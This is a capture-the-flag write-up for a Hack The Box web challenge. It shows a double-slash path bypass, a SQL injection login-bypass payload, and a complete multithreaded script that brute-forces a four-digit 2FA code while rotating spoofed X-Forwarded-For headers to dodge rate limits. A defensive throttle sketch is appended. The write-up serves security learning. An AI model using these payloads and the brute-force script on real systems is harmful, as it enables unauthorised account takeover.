HTB_No-Threshold

No-Threshold

Challenge description

Prepare for the finest magic products out there. However, please be aware that we’ve implemented a specialized protective spell within our web application to guard against any black magic aimed at our web shop.

Challenge analysis

Download the challenge source and analyse it. dashboard.py shows that once we pass authentication, the dashboard view hands us the flag directly:

```python
def dash():
    return render_template("private/dashboard.html", flag=Config.FLAG)
```

Looking at login.py: if the user logs in successfully they are redirected to /auth/verify-2fa; otherwise they are sent back to public/login.html.

Solution

However, clicking login on the page returns a 403. Fuzzing the path shows that //auth/login (double slash) gets past the block.

Trying the classic "universal password" SQL injection to bypass the login check works:

```text
username=admin'+or+'1'='1&password=password
```

That lands us on the /auth/verify-2fa page. Since the code is only four digits, brute force is feasible. The server blocks an IP that sends too many requests in a short time, so the script below changes the X-Forwarded-For header to a new IP every five requests:

```python
import requests
import sys
from concurrent.futures import ThreadPoolExecutor


def get_combinations_in_array(path):
    # One candidate 2FA code per line (e.g. 0000-9999)
    with open(path, 'r') as f:
        return f.read().splitlines()


def handle_response(response, combination):
    if "Invalid 2FA Code!" in response.text:
        print(f'Try: {combination}\n')
        return
    elif "flag" in response.text:
        print(f'GOT IT!\n2FA Code: {combination}\n{response.text}\n')
        sys.exit()
    else:
        # Anything else (e.g. a block page) is printed so the throttle is visible
        print(response.text)


def send_request(ip, combination, headers, url):
    # Copy the headers per request: the dict is shared between worker threads,
    # so mutating it in place would race and send the wrong X-Forwarded-For.
    headers = dict(headers, **{'X-Forwarded-For': ip})
    data = {'2fa-code': str(combination)}

    response = requests.post(url, headers=headers, data=data)
    handle_response(response, combination)


def send_all_requests(url, combinations_array):
    base_ip = '192.168.'
    current_ip_suffix = [1, 1]
    headers = {
        'Host': '83.136.249.173:34046',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Referer': '83.136.249.173:34046/auth/verify-2fa',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '13',
        'Origin': '83.136.249.173:34046',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }

    # Multi-threaded request sending (see the ThreadPoolExecutor docs for details)
    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = []

        for i, combination in enumerate(combinations_array, start=1):
            ip = base_ip + str(current_ip_suffix[0]) + '.' + str(current_ip_suffix[1])

            future = executor.submit(send_request, ip, combination, headers, url)
            futures.append(future)

            # Move to the next spoofed source address every five requests
            if i % 5 == 0:
                current_ip_suffix[1] += 1

                if current_ip_suffix[1] > 254:
                    current_ip_suffix[1] = 1
                    current_ip_suffix[0] += 1

                    if current_ip_suffix[0] > 254:
                        current_ip_suffix = [1, 1]

        for future in futures:
            future.result()


if __name__ == '__main__':
    combinations_path = '4-digit-wordlist.txt'
    url = 'http://83.136.249.173:34046/auth/verify-2fa'

    combinations_array = get_combinations_in_array(combinations_path)
    send_all_requests(url, combinations_array)
```

Flag: HTB{1_l0v3_h4pr0x1_4cl5_4nd_4ll_1t5_f34tur35}
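As an added example (my own sketch, not the author's script or the challenge's code), a throttle that the rotated X-Forwarded-For trick above would not get past: the header is only honoured when the TCP peer is the trusted proxy, and failed codes are budgeted per account as well as per IP. TRUSTED_PROXIES, the limits and the function names are assumptions.

```python
from collections import defaultdict
from typing import Optional

# Assumed address of the HAProxy front end that sits in front of the Flask app.
TRUSTED_PROXIES = {"10.0.0.2"}


def client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """Address to throttle on.

    X-Forwarded-For is attacker-controlled unless the TCP peer is our own
    proxy, and even then only the last hop the proxy appended is trustworthy.
    """
    if remote_addr not in TRUSTED_PROXIES or not xff:
        return remote_addr
    return xff.split(",")[-1].strip()


class TwoFaThrottle:
    """Budget failed 2FA attempts per client IP and per account."""

    def __init__(self, per_ip: int = 20, per_account: int = 5) -> None:
        self.per_ip, self.per_account = per_ip, per_account
        self.ip_hits = defaultdict(int)
        self.account_hits = defaultdict(int)

    def register_failure(self, account: str, remote_addr: str,
                         xff: Optional[str]) -> bool:
        """Count one wrong code; returns False once either budget is spent.

        The per-account budget is what defeats rotating X-Forwarded-For: a
        4-digit code has 10000 values, so a handful of tries per account is
        hopeless for a guesser however many source addresses are claimed.
        """
        ip = client_ip(remote_addr, xff)
        self.ip_hits[ip] += 1
        self.account_hits[account] += 1
        return (self.ip_hits[ip] <= self.per_ip
                and self.account_hits[account] <= self.per_account)

    def reset(self, account: str) -> None:
        """Clear the account budget after a successful verification."""
        self.account_hits.pop(account, None)
```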


http://example.com/2024/05/28/htb-WsTodo/
Author: ZERO
Published: 28 May 2024